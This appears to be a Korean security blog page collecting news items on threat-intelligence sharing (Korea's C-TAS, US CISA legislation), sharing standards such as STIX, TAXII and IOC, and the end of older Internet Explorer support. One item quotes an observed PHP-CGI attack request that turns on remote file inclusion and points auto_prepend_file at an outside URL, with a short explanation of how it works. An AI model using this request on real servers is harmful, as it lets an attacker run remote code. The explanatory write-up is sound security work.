Infosec Ledger

최근 한수원을 비롯하여 특정 국가 기관을 타겟으로 하는 APT 사이버공격이 지속적으로 발생하고 있다. 이에 대응하기 위해 국내에서는 2014년 8월부터 사이버 위협 정보 분석·공유시스템(C-TAS, Cyber Threat Analysis & Share)서비스를 운영하고 있다. C-TAS는 침해사고 정보 수집, 침해사고 종합 분석, 정보공유 3단계로 구분되며, 정보 제공을 해야 정보를 받아 볼 수 있는 구조이다. 보안기사에 의하면 현재는 KISA의 일방향적 정보공유의 성격이 강하며, 참여하고 있는 기업들의 정보 제공과 공유가 아직까지 완전한 대칭을 이루고 있지는 않다고 한다. 비록 위협을 받은 기업의 소중한 데이터들이 공개될 수 있기에 공유하기가 어렵겠지만, 대형 침해사고를 예방하기 위해서 신뢰성 있는 다양한 정보들이 수집되고 공유될 필요가 있다. 

위협정보 공유한다는 C-TAS, 얼마나 알고 있나요?

http://www.boannews.com/media/view.asp?idx=48763
C-TAS 사이버 위협정보 '신뢰성 확보 시급'

http://www.etnews.com/20151130000325

미국은 주요 기반 시설 보호 강화를 위한 사이버 보안 정책을 추진하고 있으며, 민·관 파트너십을 기반으로 한 사이버 위협정보 공유 체계를 구축하였다. 그러나 소니 영화사 해킹 사건을 계기로 오바마 대통령은 지난 2월 사이버 위협 정보통합센터(Cyber Threat Intelligence Integration Center, CTIIC) 설립을 승인하고, 민간 부문 사이버 위협 정보 공유 촉진을 골자로 한 행정명령(Executive Order, EO) 제13691호를 발표하였다. 또한, 미 상원과 하원 각 정보위원회에서는 연방정부와 민간 부문의 사이버 보안 및 위협 정보 공유에 관한 입법을 추진하고 있고, 얼마전 미 상원에서 압도적인 지지율로 '사이버보안 정보 공유에 관한 법률'이 통과되었다.
http://money.cnn.com/2015/10/27/technology/cisa-cybersecurity-information-sharing-act/index.html

미국과 중국, 사이버보안 협력체제를 위한 정보공유와 직통전화 설치

http://www.itworld.co.kr/news/96868
크라우드스트라이크(CrowdStrike) '사이버 침입 서비스 케이스북(Cyber Intrusion Services Casebook)' 발간

http://www.boannews.com/media/view.asp?idx=48764&kind=0

■ STIX(Structure Threat Information eXpression): 사이버 위협 정보 관련 표준

■ TAXII(Trusted Automated eXchange of Indicator Information):사이버 위협 정보 전송 규격

■ MAEC(Malware Attribute Enumeration and Characterization):악성코드 속성 정보 관련 표준

■ CybOX(Cyber Observables eXpression): 사이버 운영 오브젝트 관련 표준

■ MMDEF(Malware Metadata Exchange Format): 악성코드정보 공유 관련 표준

■ CVE(Common Vulnerabilities and Exposures): 공격 취약점 관련 표준

■ CPE(Common Platform Enumeration): 공격 타깃 플랫폼관련 표준
■ IOC(Indicators Of Compromised): 침해 지표

호스트나 네트워크 상에서 침해 혹은 감염을 식별할 수 있는 포렌식 아티팩트로서, 침해사고 탐지/분석 및 악성코드 행위분석이 주 목적이다. Fireeye의 홈페이지에서 제공하는 IOC Editor를 이용하여 손쉽게 IOC를 생성 할 수 있으며 md5, 파일명, 파일경로, 파일 크기, 파일 생성시간, IP, 레지스트리 등 다양한 정보를 포함한다. 국내ㆍ외 보안뉴스 모니터링을 하다보면 IOC를 공유하는 모습을 종종 볼 수있다.

TDrop2 Attacks Suggest Dark Seoul Attackers Return

http://researchcenter.paloaltonetworks.com/2015/11/tdrop2-attacks-suggest-dark-seoul-attackers-return/
[AhnLab]_Black_Mine_Operation.pdf 내용 中

http://www.ahnlab.com/kr/site/securityinfo/secunews/secuNewsView.do?seq=23706
http://boho.or.kr/upload/file/EpF903.pdf
http://secure360.org/wp-content/uploads/2014/05/Threat-Intelligence-Sharing-using-STIX-and-TAXII.pdf
https://www.fireeye.com/services/freeware/ioc-editor.html

GET index.php/?-d allow_url_include=On -d auto_prepend_file=http://netsunucum.com/status/-/d.txt

위 요청은 외부의 파일을 include, include_once, require, require_once 와 같은 파일로 include 허용시키고, http://netsunucum.com/status/-/d.txt 파일을 실행키려는 것이다.(index.php를 나중에 실행한다.)
http://netsunucum.com/status/-/d.txt 파일의 내용은 아래와 같다.

이미지 출처 : https://www.microsoft.com/ko-kr/events/windows10/IE.aspx#quick02

2016년 1월 12일, IE 지원정책에 변경으로 IE 하위버전에 대한 지원이 중단됩니다. 

Microsoft 지원주기 정책은 최소 5년 일반지원 그리고 비즈니스 및 개발자 제품과 Windows 운영체제에 대한 최소 5년의 추가 지원을 제공합니다. 2016년 1월 12일부터 아래 표에서 지원되는 운영체제와 IE브라우저의 조합에만 기술지원 및 보안업데이트를 제공합니다. 

Windows7 에서는 IE11만 기술지원 및 보안업데이트를 받게 되며, IE8, IE9, IE10의 경우 IE11로의 업그레이드가 필요합니다.

출처 : http://blog.alyac.co.kr/471